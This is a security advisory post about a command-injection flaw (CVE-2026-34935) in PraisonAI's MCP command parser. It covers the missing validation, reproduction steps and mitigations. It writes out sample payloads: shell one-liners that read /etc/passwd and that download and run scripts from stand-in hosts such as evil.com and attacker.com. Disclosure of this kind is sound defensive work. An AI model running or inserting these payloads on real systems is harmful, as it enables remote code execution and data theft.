PraisonAI, Command Injection, CVE-2026-34935 (Critical)

Listen to this Post

The vulnerability exists in the `parse_mcp_command()` function inside src/praisonai/praisonai/cli/features/mcp.py. This function is responsible for parsing MCP server command strings into an executable, arguments, and environment variables before passing them to a subprocess. The pre-patch version had no validation at all. The fix commit `47bff65413be` was intended to address command injection, but it failed to add three critical controls. First, there is no allowlist of permitted executables such as npx, uvx, node, or python. Second, there is no `os.path.basename()` validation, allowing path-based injection like /bin/sh. Third, there is no argument inspection to block shell metacharacters or dangerous flags like `-c` or -e. As a result, an attacker can supply malicious MCP server commands such as python -c 'import os; os.system("id")', bash -c 'cat /etc/passwd', or /bin/sh -c 'wget http://evil.com/shell.sh | sh'. These strings are accepted without filtering and passed directly to `subprocess` execution. The PoC demonstrates that all malicious commands are accepted. An attacker who can influence the MCP server configuration—for example, via a malicious plugin or shared config file—can execute arbitrary system commands on the host. This leads to full remote code execution, data exfiltration, and lateral movement.
Platform: PraisonAI PyPI
Version: Before commit 47bff65413be
Vulnerability: Arbitrary command execution
Severity: Critical
date: 2026-04-17

Prediction: Expected patch 2026-05-01

What Undercode Say:

Clone vulnerable commit
git clone https://github.com/MervinPraison/PraisonAI /tmp/praisonai_real
cd /tmp/praisonai_real && git checkout 47bff654~1
Run PoC
python3 poc.py
Check for lack of validation
grep -n "ALLOWED_COMMANDS" src/praisonai/praisonai/cli/features/mcp.py
grep -n "os.path.basename" src/praisonai/praisonai/cli/features/mcp.py

Exploit:

Supply malicious MCP server command string: `python -c ‘import os; os.system(“id”)’` or `bash -c ‘cat /etc/passwd’` or /bin/sh -c 'curl http://attacker.com/backdoor.sh | bash'. The `parse_mcp_command()` function returns the command and arguments unchanged, and the calling subprocess executes them with the privileges of the PraisonAI process.

Protection from this CVE:

Upgrade to commit `47bff65413be` or later (though incomplete). Implement a strict allowlist of permitted executables (npx, uvx, node, python) inside parse_mcp_command(). Use `os.path.basename()` to reject absolute paths. Inspect arguments to block -c, -e, and shell metacharacters like ;, |, &, $().

Impact:

Remote code execution on host running PraisonAI, allowing attacker to steal data, install malware, pivot to internal network, and compromise entire system.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top